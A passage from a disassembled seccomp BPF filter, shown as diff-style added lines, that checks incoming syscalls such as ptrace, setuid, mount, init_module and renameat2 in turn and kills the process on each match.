goto 0186 + 0185: 0x06 0x00 0x00 0x00000000 return KILL + 0186: 0x15 0x00 0x01 0x00000061 if (A != getrlimit) goto 0188 + 0187: 0x06 0x00 0x00 0x00000000 return KILL + 0188: 0x15 0x00 0x01 0x00000062 if (A != getrusage) goto 0190 + 0189: 0x06 0x00 0x00 0x00000000 return KILL + 0190: 0x15 0x00 0x01 0x00000063 if (A != sysinfo) goto 0192 + 0191: 0x06 0x00 0x00 0x00000000 return KILL + 0192: 0x15 0x00 0x01 0x00000064 if (A != times) goto 0194 + 0193: 0x06 0x00 0x00 0x00000000 return KILL + 0194: 0x15 0x00 0x01 0x00000065 if (A != ptrace) goto 0196 + 0195: 0x06 0x00 0x00 0x00000000 return KILL + 0196: 0x15 0x00 0x01 0x00000066 if (A != getuid) goto 0198 + 0197: 0x06 0x00 0x00 0x00000000 return KILL + 0198: 0x15 0x00 0x01 0x00000067 if (A != syslog) goto 0200 + 0199: 0x06 0x00 0x00 0x00000000 return KILL + 0200: 0x15 0x00 0x01 0x00000068 if (A != getgid) goto 0202 + 0201: 0x06 0x00 0x00 0x00000000 return KILL + 0202: 0x15 0x00 0x01 0x00000069 if (A != setuid) goto 0204 + 0203: 0x06 0x00 0x00 0x00000000 return KILL + 0204: 0x15 0x00 0x01 0x0000006a if (A != setgid) goto 0206 + 0205: 0x06 0x00 0x00 0x00000000 return KILL + 0206: 0x15 0x00 0x01 0x0000006b if (A != geteuid) goto 0208 + 0207: 0x06 0x00 0x00 0x00000000 return KILL + 0208: 0x15 0x00 0x01 0x0000006c if (A != getegid) goto 0210 + 0209: 0x06 0x00 0x00 0x00000000 return KILL + 0210: 0x15 0x00 0x01 0x0000006d if (A != setpgid) goto 0212 + 0211: 0x06 0x00 0x00 0x00000000 return KILL + 0212: 0x15 0x00 0x01 0x0000006e if (A != getppid) goto 0214 + 0213: 0x06 0x00 0x00 0x00000000 return KILL + 0214: 0x15 0x00 0x01 0x0000006f if (A != getpgrp) goto 0216 + 0215: 0x06 0x00 0x00 0x00000000 return KILL + 0216: 0x15 0x00 0x01 0x00000070 if (A != setsid) goto 0218 + 0217: 0x06 0x00 0x00 0x00000000 return KILL + 0218: 0x15 0x00 0x01 0x00000071 if (A != setreuid) goto 0220 + 0219: 0x06 0x00 0x00 0x00000000 return KILL + 0220: 0x15 0x00 0x01 0x00000072 if (A != setregid) goto 0222 + 0221: 0x06 0x00 0x00 0x00000000 return KILL + 
0222: 0x15 0x00 0x01 0x00000073 if (A != getgroups) goto 0224 + 0223: 0x06 0x00 0x00 0x00000000 return KILL + 0224: 0x15 0x00 0x01 0x00000074 if (A != setgroups) goto 0226 + 0225: 0x06 0x00 0x00 0x00000000 return KILL + 0226: 0x15 0x00 0x01 0x00000075 if (A != setresuid) goto 0228 + 0227: 0x06 0x00 0x00 0x00000000 return KILL + 0228: 0x15 0x00 0x01 0x00000076 if (A != getresuid) goto 0230 + 0229: 0x06 0x00 0x00 0x00000000 return KILL + 0230: 0x15 0x00 0x01 0x00000077 if (A != setresgid) goto 0232 + 0231: 0x06 0x00 0x00 0x00000000 return KILL + 0232: 0x15 0x00 0x01 0x00000078 if (A != getresgid) goto 0234 + 0233: 0x06 0x00 0x00 0x00000000 return KILL + 0234: 0x15 0x00 0x01 0x00000079 if (A != getpgid) goto 0236 + 0235: 0x06 0x00 0x00 0x00000000 return KILL + 0236: 0x15 0x00 0x01 0x0000007a if (A != setfsuid) goto 0238 + 0237: 0x06 0x00 0x00 0x00000000 return KILL + 0238: 0x15 0x00 0x01 0x0000007b if (A != setfsgid) goto 0240 + 0239: 0x06 0x00 0x00 0x00000000 return KILL + 0240: 0x15 0x00 0x01 0x0000007c if (A != getsid) goto 0242 + 0241: 0x06 0x00 0x00 0x00000000 return KILL + 0242: 0x15 0x00 0x01 0x0000007d if (A != capget) goto 0244 + 0243: 0x06 0x00 0x00 0x00000000 return KILL + 0244: 0x15 0x00 0x01 0x0000007e if (A != capset) goto 0246 + 0245: 0x06 0x00 0x00 0x00000000 return KILL + 0246: 0x15 0x00 0x01 0x0000007f if (A != rt_sigpending) goto 0248 + 0247: 0x06 0x00 0x00 0x00000000 return KILL + 0248: 0x15 0x00 0x01 0x00000080 if (A != rt_sigtimedwait) goto 0250 + 0249: 0x06 0x00 0x00 0x00000000 return KILL + 0250: 0x15 0x00 0x01 0x00000081 if (A != rt_sigqueueinfo) goto 0252 + 0251: 0x06 0x00 0x00 0x00000000 return KILL + 0252: 0x15 0x00 0x01 0x00000082 if (A != rt_sigsuspend) goto 0254 + 0253: 0x06 0x00 0x00 0x00000000 return KILL + 0254: 0x15 0x00 0x01 0x00000083 if (A != sigaltstack) goto 0256 + 0255: 0x06 0x00 0x00 0x00000000 return KILL + 0256: 0x15 0x00 0x01 0x00000084 if (A != utime) goto 0258 + 0257: 0x06 0x00 0x00 0x00000000 return KILL + 0258: 0x15 
0x00 0x01 0x00000085 if (A != mknod) goto 0260 + 0259: 0x06 0x00 0x00 0x00000000 return KILL + 0260: 0x15 0x00 0x01 0x00000086 if (A != uselib) goto 0262 + 0261: 0x06 0x00 0x00 0x00000000 return KILL + 0262: 0x15 0x00 0x01 0x00000087 if (A != personality) goto 0264 + 0263: 0x06 0x00 0x00 0x00000000 return KILL + 0264: 0x15 0x00 0x01 0x00000088 if (A != ustat) goto 0266 + 0265: 0x06 0x00 0x00 0x00000000 return KILL + 0266: 0x15 0x00 0x01 0x00000089 if (A != statfs) goto 0268 + 0267: 0x06 0x00 0x00 0x00000000 return KILL + 0268: 0x15 0x00 0x01 0x0000008a if (A != fstatfs) goto 0270 + 0269: 0x06 0x00 0x00 0x00000000 return KILL + 0270: 0x15 0x00 0x01 0x0000008b if (A != sysfs) goto 0272 + 0271: 0x06 0x00 0x00 0x00000000 return KILL + 0272: 0x15 0x00 0x01 0x0000008c if (A != getpriority) goto 0274 + 0273: 0x06 0x00 0x00 0x00000000 return KILL + 0274: 0x15 0x00 0x01 0x0000008d if (A != setpriority) goto 0276 + 0275: 0x06 0x00 0x00 0x00000000 return KILL + 0276: 0x15 0x00 0x01 0x0000008e if (A != sched_setparam) goto 0278 + 0277: 0x06 0x00 0x00 0x00000000 return KILL + 0278: 0x15 0x00 0x01 0x0000008f if (A != sched_getparam) goto 0280 + 0279: 0x06 0x00 0x00 0x00000000 return KILL + 0280: 0x15 0x00 0x01 0x00000090 if (A != sched_setscheduler) goto 0282 + 0281: 0x06 0x00 0x00 0x00000000 return KILL + 0282: 0x15 0x00 0x01 0x00000091 if (A != sched_getscheduler) goto 0284 + 0283: 0x06 0x00 0x00 0x00000000 return KILL + 0284: 0x15 0x00 0x01 0x00000092 if (A != sched_get_priority_max) goto 0286 + 0285: 0x06 0x00 0x00 0x00000000 return KILL + 0286: 0x15 0x00 0x01 0x00000093 if (A != sched_get_priority_min) goto 0288 + 0287: 0x06 0x00 0x00 0x00000000 return KILL + 0288: 0x15 0x00 0x01 0x00000094 if (A != sched_rr_get_interval) goto 0290 + 0289: 0x06 0x00 0x00 0x00000000 return KILL + 0290: 0x15 0x00 0x01 0x00000095 if (A != mlock) goto 0292 + 0291: 0x06 0x00 0x00 0x00000000 return KILL + 0292: 0x15 0x00 0x01 0x00000096 if (A != munlock) goto 0294 + 0293: 0x06 0x00 0x00 
0x00000000 return KILL + 0294: 0x15 0x00 0x01 0x00000097 if (A != mlockall) goto 0296 + 0295: 0x06 0x00 0x00 0x00000000 return KILL + 0296: 0x15 0x00 0x01 0x00000098 if (A != munlockall) goto 0298 + 0297: 0x06 0x00 0x00 0x00000000 return KILL + 0298: 0x15 0x00 0x01 0x00000099 if (A != vhangup) goto 0300 + 0299: 0x06 0x00 0x00 0x00000000 return KILL + 0300: 0x15 0x00 0x01 0x0000009a if (A != modify_ldt) goto 0302 + 0301: 0x06 0x00 0x00 0x00000000 return KILL + 0302: 0x15 0x00 0x01 0x0000009b if (A != pivot_root) goto 0304 + 0303: 0x06 0x00 0x00 0x00000000 return KILL + 0304: 0x15 0x00 0x01 0x0000009c if (A != _sysctl) goto 0306 + 0305: 0x06 0x00 0x00 0x00000000 return KILL + 0306: 0x15 0x00 0x01 0x0000009d if (A != prctl) goto 0308 + 0307: 0x06 0x00 0x00 0x00000000 return KILL + 0308: 0x15 0x00 0x01 0x0000009e if (A != arch_prctl) goto 0310 + 0309: 0x06 0x00 0x00 0x00000000 return KILL + 0310: 0x15 0x00 0x01 0x0000009f if (A != adjtimex) goto 0312 + 0311: 0x06 0x00 0x00 0x00000000 return KILL + 0312: 0x15 0x00 0x01 0x000000a0 if (A != setrlimit) goto 0314 + 0313: 0x06 0x00 0x00 0x00000000 return KILL + 0314: 0x15 0x00 0x01 0x000000a1 if (A != chroot) goto 0316 + 0315: 0x06 0x00 0x00 0x00000000 return KILL + 0316: 0x15 0x00 0x01 0x000000a2 if (A != sync) goto 0318 + 0317: 0x06 0x00 0x00 0x00000000 return KILL + 0318: 0x15 0x00 0x01 0x000000a3 if (A != acct) goto 0320 + 0319: 0x06 0x00 0x00 0x00000000 return KILL + 0320: 0x15 0x00 0x01 0x000000a4 if (A != settimeofday) goto 0322 + 0321: 0x06 0x00 0x00 0x00000000 return KILL + 0322: 0x15 0x00 0x01 0x000000a5 if (A != mount) goto 0324 + 0323: 0x06 0x00 0x00 0x00000000 return KILL + 0324: 0x15 0x00 0x01 0x000000a6 if (A != umount2) goto 0326 + 0325: 0x06 0x00 0x00 0x00000000 return KILL + 0326: 0x15 0x00 0x01 0x000000a7 if (A != swapon) goto 0328 + 0327: 0x06 0x00 0x00 0x00000000 return KILL + 0328: 0x15 0x00 0x01 0x000000a8 if (A != swapoff) goto 0330 + 0329: 0x06 0x00 0x00 0x00000000 return KILL + 0330: 0x15 0x00 0x01 
0x000000aa if (A != sethostname) goto 0332 + 0331: 0x06 0x00 0x00 0x00000000 return KILL + 0332: 0x15 0x00 0x01 0x000000ab if (A != setdomainname) goto 0334 + 0333: 0x06 0x00 0x00 0x00000000 return KILL + 0334: 0x15 0x00 0x01 0x000000ac if (A != iopl) goto 0336 + 0335: 0x06 0x00 0x00 0x00000000 return KILL + 0336: 0x15 0x00 0x01 0x000000ad if (A != ioperm) goto 0338 + 0337: 0x06 0x00 0x00 0x00000000 return KILL + 0338: 0x15 0x00 0x01 0x000000ae if (A != create_module) goto 0340 + 0339: 0x06 0x00 0x00 0x00000000 return KILL + 0340: 0x15 0x00 0x01 0x000000af if (A != init_module) goto 0342 + 0341: 0x06 0x00 0x00 0x00000000 return KILL + 0342: 0x15 0x00 0x01 0x000000b0 if (A != delete_module) goto 0344 + 0343: 0x06 0x00 0x00 0x00000000 return KILL + 0344: 0x15 0x00 0x01 0x000000b1 if (A != get_kernel_syms) goto 0346 + 0345: 0x06 0x00 0x00 0x00000000 return KILL + 0346: 0x15 0x00 0x01 0x000000b2 if (A != query_module) goto 0348 + 0347: 0x06 0x00 0x00 0x00000000 return KILL + 0348: 0x15 0x00 0x01 0x000000b3 if (A != quotactl) goto 0350 + 0349: 0x06 0x00 0x00 0x00000000 return KILL + 0350: 0x15 0x00 0x01 0x000000b4 if (A != nfsservctl) goto 0352 + 0351: 0x06 0x00 0x00 0x00000000 return KILL + 0352: 0x15 0x00 0x01 0x000000b5 if (A != getpmsg) goto 0354 + 0353: 0x06 0x00 0x00 0x00000000 return KILL + 0354: 0x15 0x00 0x01 0x000000b6 if (A != putpmsg) goto 0356 + 0355: 0x06 0x00 0x00 0x00000000 return KILL + 0356: 0x15 0x00 0x01 0x000000b7 if (A != afs_syscall) goto 0358 + 0357: 0x06 0x00 0x00 0x00000000 return KILL + 0358: 0x15 0x00 0x01 0x000000b8 if (A != tuxcall) goto 0360 + 0359: 0x06 0x00 0x00 0x00000000 return KILL + 0360: 0x15 0x00 0x01 0x000000b9 if (A != security) goto 0362 + 0361: 0x06 0x00 0x00 0x00000000 return KILL + 0362: 0x15 0x00 0x01 0x000000ba if (A != gettid) goto 0364 + 0363: 0x06 0x00 0x00 0x00000000 return KILL + 0364: 0x15 0x00 0x01 0x000000bb if (A != readahead) goto 0366 + 0365: 0x06 0x00 0x00 0x00000000 return KILL + 0366: 0x15 0x00 0x01 0x000000bc 
if (A != setxattr) goto 0368 + 0367: 0x06 0x00 0x00 0x00000000 return KILL + 0368: 0x15 0x00 0x01 0x000000bd if (A != lsetxattr) goto 0370 + 0369: 0x06 0x00 0x00 0x00000000 return KILL + 0370: 0x15 0x00 0x01 0x000000be if (A != fsetxattr) goto 0372 + 0371: 0x06 0x00 0x00 0x00000000 return KILL + 0372: 0x15 0x00 0x01 0x000000bf if (A != getxattr) goto 0374 + 0373: 0x06 0x00 0x00 0x00000000 return KILL + 0374: 0x15 0x00 0x01 0x000000c0 if (A != lgetxattr) goto 0376 + 0375: 0x06 0x00 0x00 0x00000000 return KILL + 0376: 0x15 0x00 0x01 0x000000c1 if (A != fgetxattr) goto 0378 + 0377: 0x06 0x00 0x00 0x00000000 return KILL + 0378: 0x15 0x00 0x01 0x000000c2 if (A != listxattr) goto 0380 + 0379: 0x06 0x00 0x00 0x00000000 return KILL + 0380: 0x15 0x00 0x01 0x000000c3 if (A != llistxattr) goto 0382 + 0381: 0x06 0x00 0x00 0x00000000 return KILL + 0382: 0x15 0x00 0x01 0x000000c4 if (A != flistxattr) goto 0384 + 0383: 0x06 0x00 0x00 0x00000000 return KILL + 0384: 0x15 0x00 0x01 0x000000c5 if (A != removexattr) goto 0386 + 0385: 0x06 0x00 0x00 0x00000000 return KILL + 0386: 0x15 0x00 0x01 0x000000c6 if (A != lremovexattr) goto 0388 + 0387: 0x06 0x00 0x00 0x00000000 return KILL + 0388: 0x15 0x00 0x01 0x000000c7 if (A != fremovexattr) goto 0390 + 0389: 0x06 0x00 0x00 0x00000000 return KILL + 0390: 0x15 0x00 0x01 0x000000c8 if (A != tkill) goto 0392 + 0391: 0x06 0x00 0x00 0x00000000 return KILL + 0392: 0x15 0x00 0x01 0x000000c9 if (A != time) goto 0394 + 0393: 0x06 0x00 0x00 0x00000000 return KILL + 0394: 0x15 0x00 0x01 0x000000ca if (A != futex) goto 0396 + 0395: 0x06 0x00 0x00 0x00000000 return KILL + 0396: 0x15 0x00 0x01 0x000000cb if (A != sched_setaffinity) goto 0398 + 0397: 0x06 0x00 0x00 0x00000000 return KILL + 0398: 0x15 0x00 0x01 0x000000cc if (A != sched_getaffinity) goto 0400 + 0399: 0x06 0x00 0x00 0x00000000 return KILL + 0400: 0x15 0x00 0x01 0x000000cd if (A != set_thread_area) goto 0402 + 0401: 0x06 0x00 0x00 0x00000000 return KILL + 0402: 0x15 0x00 0x01 0x000000ce if 
(A != io_setup) goto 0404 + 0403: 0x06 0x00 0x00 0x00000000 return KILL + 0404: 0x15 0x00 0x01 0x000000cf if (A != io_destroy) goto 0406 + 0405: 0x06 0x00 0x00 0x00000000 return KILL + 0406: 0x15 0x00 0x01 0x000000d0 if (A != io_getevents) goto 0408 + 0407: 0x06 0x00 0x00 0x00000000 return KILL + 0408: 0x15 0x00 0x01 0x000000d1 if (A != io_submit) goto 0410 + 0409: 0x06 0x00 0x00 0x00000000 return KILL + 0410: 0x15 0x00 0x01 0x000000d2 if (A != io_cancel) goto 0412 + 0411: 0x06 0x00 0x00 0x00000000 return KILL + 0412: 0x15 0x00 0x01 0x000000d3 if (A != get_thread_area) goto 0414 + 0413: 0x06 0x00 0x00 0x00000000 return KILL + 0414: 0x15 0x00 0x01 0x000000d4 if (A != lookup_dcookie) goto 0416 + 0415: 0x06 0x00 0x00 0x00000000 return KILL + 0416: 0x15 0x00 0x01 0x000000d5 if (A != epoll_create) goto 0418 + 0417: 0x06 0x00 0x00 0x00000000 return KILL + 0418: 0x15 0x00 0x01 0x000000d6 if (A != epoll_ctl_old) goto 0420 + 0419: 0x06 0x00 0x00 0x00000000 return KILL + 0420: 0x15 0x00 0x01 0x000000d7 if (A != epoll_wait_old) goto 0422 + 0421: 0x06 0x00 0x00 0x00000000 return KILL + 0422: 0x15 0x00 0x01 0x000000d8 if (A != remap_file_pages) goto 0424 + 0423: 0x06 0x00 0x00 0x00000000 return KILL + 0424: 0x15 0x00 0x01 0x000000d9 if (A != getdents64) goto 0426 + 0425: 0x06 0x00 0x00 0x00000000 return KILL + 0426: 0x15 0x00 0x01 0x000000da if (A != set_tid_address) goto 0428 + 0427: 0x06 0x00 0x00 0x00000000 return KILL + 0428: 0x15 0x00 0x01 0x000000db if (A != restart_syscall) goto 0430 + 0429: 0x06 0x00 0x00 0x00000000 return KILL + 0430: 0x15 0x00 0x01 0x000000dc if (A != semtimedop) goto 0432 + 0431: 0x06 0x00 0x00 0x00000000 return KILL + 0432: 0x15 0x00 0x01 0x000000dd if (A != fadvise64) goto 0434 + 0433: 0x06 0x00 0x00 0x00000000 return KILL + 0434: 0x15 0x00 0x01 0x000000de if (A != timer_create) goto 0436 + 0435: 0x06 0x00 0x00 0x00000000 return KILL + 0436: 0x15 0x00 0x01 0x000000df if (A != timer_settime) goto 0438 + 0437: 0x06 0x00 0x00 0x00000000 return KILL + 
0438: 0x15 0x00 0x01 0x000000e0 if (A != timer_gettime) goto 0440 + 0439: 0x06 0x00 0x00 0x00000000 return KILL + 0440: 0x15 0x00 0x01 0x000000e1 if (A != timer_getoverrun) goto 0442 + 0441: 0x06 0x00 0x00 0x00000000 return KILL + 0442: 0x15 0x00 0x01 0x000000e2 if (A != timer_delete) goto 0444 + 0443: 0x06 0x00 0x00 0x00000000 return KILL + 0444: 0x15 0x00 0x01 0x000000e3 if (A != clock_settime) goto 0446 + 0445: 0x06 0x00 0x00 0x00000000 return KILL + 0446: 0x15 0x00 0x01 0x000000e4 if (A != clock_gettime) goto 0448 + 0447: 0x06 0x00 0x00 0x00000000 return KILL + 0448: 0x15 0x00 0x01 0x000000e5 if (A != clock_getres) goto 0450 + 0449: 0x06 0x00 0x00 0x00000000 return KILL + 0450: 0x15 0x00 0x01 0x000000e6 if (A != clock_nanosleep) goto 0452 + 0451: 0x06 0x00 0x00 0x00000000 return KILL + 0452: 0x15 0x00 0x01 0x000000e8 if (A != epoll_wait) goto 0454 + 0453: 0x06 0x00 0x00 0x00000000 return KILL + 0454: 0x15 0x00 0x01 0x000000e9 if (A != epoll_ctl) goto 0456 + 0455: 0x06 0x00 0x00 0x00000000 return KILL + 0456: 0x15 0x00 0x01 0x000000ea if (A != tgkill) goto 0458 + 0457: 0x06 0x00 0x00 0x00000000 return KILL + 0458: 0x15 0x00 0x01 0x000000eb if (A != utimes) goto 0460 + 0459: 0x06 0x00 0x00 0x00000000 return KILL + 0460: 0x15 0x00 0x01 0x000000ec if (A != vserver) goto 0462 + 0461: 0x06 0x00 0x00 0x00000000 return KILL + 0462: 0x15 0x00 0x01 0x000000ed if (A != mbind) goto 0464 + 0463: 0x06 0x00 0x00 0x00000000 return KILL + 0464: 0x15 0x00 0x01 0x000000ee if (A != set_mempolicy) goto 0466 + 0465: 0x06 0x00 0x00 0x00000000 return KILL + 0466: 0x15 0x00 0x01 0x000000ef if (A != get_mempolicy) goto 0468 + 0467: 0x06 0x00 0x00 0x00000000 return KILL + 0468: 0x15 0x00 0x01 0x000000f0 if (A != mq_open) goto 0470 + 0469: 0x06 0x00 0x00 0x00000000 return KILL + 0470: 0x15 0x00 0x01 0x000000f1 if (A != mq_unlink) goto 0472 + 0471: 0x06 0x00 0x00 0x00000000 return KILL + 0472: 0x15 0x00 0x01 0x000000f2 if (A != mq_timedsend) goto 0474 + 0473: 0x06 0x00 0x00 0x00000000 
return KILL + 0474: 0x15 0x00 0x01 0x000000f3 if (A != mq_timedreceive) goto 0476 + 0475: 0x06 0x00 0x00 0x00000000 return KILL + 0476: 0x15 0x00 0x01 0x000000f4 if (A != mq_notify) goto 0478 + 0477: 0x06 0x00 0x00 0x00000000 return KILL + 0478: 0x15 0x00 0x01 0x000000f5 if (A != mq_getsetattr) goto 0480 + 0479: 0x06 0x00 0x00 0x00000000 return KILL + 0480: 0x15 0x00 0x01 0x000000f6 if (A != kexec_load) goto 0482 + 0481: 0x06 0x00 0x00 0x00000000 return KILL + 0482: 0x15 0x00 0x01 0x000000f7 if (A != waitid) goto 0484 + 0483: 0x06 0x00 0x00 0x00000000 return KILL + 0484: 0x15 0x00 0x01 0x000000f8 if (A != add_key) goto 0486 + 0485: 0x06 0x00 0x00 0x00000000 return KILL + 0486: 0x15 0x00 0x01 0x000000f9 if (A != request_key) goto 0488 + 0487: 0x06 0x00 0x00 0x00000000 return KILL + 0488: 0x15 0x00 0x01 0x000000fa if (A != keyctl) goto 0490 + 0489: 0x06 0x00 0x00 0x00000000 return KILL + 0490: 0x15 0x00 0x01 0x000000fb if (A != ioprio_set) goto 0492 + 0491: 0x06 0x00 0x00 0x00000000 return KILL + 0492: 0x15 0x00 0x01 0x000000fc if (A != ioprio_get) goto 0494 + 0493: 0x06 0x00 0x00 0x00000000 return KILL + 0494: 0x15 0x00 0x01 0x000000fd if (A != inotify_init) goto 0496 + 0495: 0x06 0x00 0x00 0x00000000 return KILL + 0496: 0x15 0x00 0x01 0x000000fe if (A != inotify_add_watch) goto 0498 + 0497: 0x06 0x00 0x00 0x00000000 return KILL + 0498: 0x15 0x00 0x01 0x000000ff if (A != inotify_rm_watch) goto 0500 + 0499: 0x06 0x00 0x00 0x00000000 return KILL + 0500: 0x15 0x00 0x01 0x00000100 if (A != migrate_pages) goto 0502 + 0501: 0x06 0x00 0x00 0x00000000 return KILL + 0502: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0504 + 0503: 0x06 0x00 0x00 0x00000000 return KILL + 0504: 0x15 0x00 0x01 0x00000102 if (A != mkdirat) goto 0506 + 0505: 0x06 0x00 0x00 0x00000000 return KILL + 0506: 0x15 0x00 0x01 0x00000103 if (A != mknodat) goto 0508 + 0507: 0x06 0x00 0x00 0x00000000 return KILL + 0508: 0x15 0x00 0x01 0x00000104 if (A != fchownat) goto 0510 + 0509: 0x06 0x00 0x00 
0x00000000 return KILL + 0510: 0x15 0x00 0x01 0x00000105 if (A != futimesat) goto 0512 + 0511: 0x06 0x00 0x00 0x00000000 return KILL + 0512: 0x15 0x00 0x01 0x00000106 if (A != newfstatat) goto 0514 + 0513: 0x06 0x00 0x00 0x00000000 return KILL + 0514: 0x15 0x00 0x01 0x00000107 if (A != unlinkat) goto 0516 + 0515: 0x06 0x00 0x00 0x00000000 return KILL + 0516: 0x15 0x00 0x01 0x00000108 if (A != renameat) goto 0518 + 0517: 0x06 0x00 0x00 0x00000000 return KILL + 0518: 0x15 0x00 0x01 0x00000109 if (A != linkat) goto 0520 + 0519: 0x06 0x00 0x00 0x00000000 return KILL + 0520: 0x15 0x00 0x01 0x0000010a if (A != symlinkat) goto 0522 + 0521: 0x06 0x00 0x00 0x00000000 return KILL + 0522: 0x15 0x00 0x01 0x0000010b if (A != readlinkat) goto 0524 + 0523: 0x06 0x00 0x00 0x00000000 return KILL + 0524: 0x15 0x00 0x01 0x0000010c if (A != fchmodat) goto 0526 + 0525: 0x06 0x00 0x00 0x00000000 return KILL + 0526: 0x15 0x00 0x01 0x0000010d if (A != faccessat) goto 0528 + 0527: 0x06 0x00 0x00 0x00000000 return KILL + 0528: 0x15 0x00 0x01 0x0000010e if (A != pselect6) goto 0530 + 0529: 0x06 0x00 0x00 0x00000000 return KILL + 0530: 0x15 0x00 0x01 0x0000010f if (A != ppoll) goto 0532 + 0531: 0x06 0x00 0x00 0x00000000 return KILL + 0532: 0x15 0x00 0x01 0x00000110 if (A != unshare) goto 0534 + 0533: 0x06 0x00 0x00 0x00000000 return KILL + 0534: 0x15 0x00 0x01 0x00000111 if (A != set_robust_list) goto 0536 + 0535: 0x06 0x00 0x00 0x00000000 return KILL + 0536: 0x15 0x00 0x01 0x00000112 if (A != get_robust_list) goto 0538 + 0537: 0x06 0x00 0x00 0x00000000 return KILL + 0538: 0x15 0x00 0x01 0x00000113 if (A != splice) goto 0540 + 0539: 0x06 0x00 0x00 0x00000000 return KILL + 0540: 0x15 0x00 0x01 0x00000114 if (A != tee) goto 0542 + 0541: 0x06 0x00 0x00 0x00000000 return KILL + 0542: 0x15 0x00 0x01 0x00000115 if (A != sync_file_range) goto 0544 + 0543: 0x06 0x00 0x00 0x00000000 return KILL + 0544: 0x15 0x00 0x01 0x00000116 if (A != vmsplice) goto 0546 + 0545: 0x06 0x00 0x00 0x00000000 return KILL 
+ 0546: 0x15 0x00 0x01 0x00000117 if (A != move_pages) goto 0548 + 0547: 0x06 0x00 0x00 0x00000000 return KILL + 0548: 0x15 0x00 0x01 0x00000118 if (A != utimensat) goto 0550 + 0549: 0x06 0x00 0x00 0x00000000 return KILL + 0550: 0x15 0x00 0x01 0x00000119 if (A != epoll_pwait) goto 0552 + 0551: 0x06 0x00 0x00 0x00000000 return KILL + 0552: 0x15 0x00 0x01 0x0000011a if (A != signalfd) goto 0554 + 0553: 0x06 0x00 0x00 0x00000000 return KILL + 0554: 0x15 0x00 0x01 0x0000011b if (A != timerfd) goto 0556 + 0555: 0x06 0x00 0x00 0x00000000 return KILL + 0556: 0x15 0x00 0x01 0x0000011c if (A != eventfd) goto 0558 + 0557: 0x06 0x00 0x00 0x00000000 return KILL + 0558: 0x15 0x00 0x01 0x0000011d if (A != fallocate) goto 0560 + 0559: 0x06 0x00 0x00 0x00000000 return KILL + 0560: 0x15 0x00 0x01 0x0000011e if (A != timerfd_settime) goto 0562 + 0561: 0x06 0x00 0x00 0x00000000 return KILL + 0562: 0x15 0x00 0x01 0x0000011f if (A != timerfd_gettime) goto 0564 + 0563: 0x06 0x00 0x00 0x00000000 return KILL + 0564: 0x15 0x00 0x01 0x00000120 if (A != accept4) goto 0566 + 0565: 0x06 0x00 0x00 0x00000000 return KILL + 0566: 0x15 0x00 0x01 0x00000121 if (A != signalfd4) goto 0568 + 0567: 0x06 0x00 0x00 0x00000000 return KILL + 0568: 0x15 0x00 0x01 0x00000122 if (A != eventfd2) goto 0570 + 0569: 0x06 0x00 0x00 0x00000000 return KILL + 0570: 0x15 0x00 0x01 0x00000123 if (A != epoll_create1) goto 0572 + 0571: 0x06 0x00 0x00 0x00000000 return KILL + 0572: 0x15 0x00 0x01 0x00000124 if (A != dup3) goto 0574 + 0573: 0x06 0x00 0x00 0x00000000 return KILL + 0574: 0x15 0x00 0x01 0x00000125 if (A != pipe2) goto 0576 + 0575: 0x06 0x00 0x00 0x00000000 return KILL + 0576: 0x15 0x00 0x01 0x00000126 if (A != inotify_init1) goto 0578 + 0577: 0x06 0x00 0x00 0x00000000 return KILL + 0578: 0x15 0x00 0x01 0x00000127 if (A != preadv) goto 0580 + 0579: 0x06 0x00 0x00 0x00000000 return KILL + 0580: 0x15 0x00 0x01 0x00000128 if (A != pwritev) goto 0582 + 0581: 0x06 0x00 0x00 0x00000000 return KILL + 0582: 0x15 0x00 
0x01 0x00000129 if (A != rt_tgsigqueueinfo) goto 0584 + 0583: 0x06 0x00 0x00 0x00000000 return KILL + 0584: 0x15 0x00 0x01 0x0000012a if (A != perf_event_open) goto 0586 + 0585: 0x06 0x00 0x00 0x00000000 return KILL + 0586: 0x15 0x00 0x01 0x0000012b if (A != recvmmsg) goto 0588 + 0587: 0x06 0x00 0x00 0x00000000 return KILL + 0588: 0x15 0x00 0x01 0x0000012c if (A != fanotify_init) goto 0590 + 0589: 0x06 0x00 0x00 0x00000000 return KILL + 0590: 0x15 0x00 0x01 0x0000012d if (A != fanotify_mark) goto 0592 + 0591: 0x06 0x00 0x00 0x00000000 return KILL + 0592: 0x15 0x00 0x01 0x0000012e if (A != prlimit64) goto 0594 + 0593: 0x06 0x00 0x00 0x00000000 return KILL + 0594: 0x15 0x00 0x01 0x0000012f if (A != name_to_handle_at) goto 0596 + 0595: 0x06 0x00 0x00 0x00000000 return KILL + 0596: 0x15 0x00 0x01 0x00000130 if (A != open_by_handle_at) goto 0598 + 0597: 0x06 0x00 0x00 0x00000000 return KILL + 0598: 0x15 0x00 0x01 0x00000131 if (A != clock_adjtime) goto 0600 + 0599: 0x06 0x00 0x00 0x00000000 return KILL + 0600: 0x15 0x00 0x01 0x00000132 if (A != syncfs) goto 0602 + 0601: 0x06 0x00 0x00 0x00000000 return KILL + 0602: 0x15 0x00 0x01 0x00000133 if (A != sendmmsg) goto 0604 + 0603: 0x06 0x00 0x00 0x00000000 return KILL + 0604: 0x15 0x00 0x01 0x00000134 if (A != setns) goto 0606 + 0605: 0x06 0x00 0x00 0x00000000 return KILL + 0606: 0x15 0x00 0x01 0x00000135 if (A != getcpu) goto 0608 + 0607: 0x06 0x00 0x00 0x00000000 return KILL + 0608: 0x15 0x00 0x01 0x00000138 if (A != kcmp) goto 0610 + 0609: 0x06 0x00 0x00 0x00000000 return KILL + 0610: 0x15 0x00 0x01 0x00000139 if (A != finit_module) goto 0612 + 0611: 0x06 0x00 0x00 0x00000000 return KILL + 0612: 0x15 0x00 0x01 0x0000013a if (A != sched_setattr) goto 0614 + 0613: 0x06 0x00 0x00 0x00000000 return KILL + 0614: 0x15 0x00 0x01 0x0000013b if (A != sched_getattr) goto 0616 + 0615: 0x06 0x00 0x00 0x00000000 return KILL + 0616: 0x15 0x00 0x01 0x0000013c if (A != renameat2) goto 0618 + 0617: 0x06 0x00 0x00 0x00000000 return KILL + 
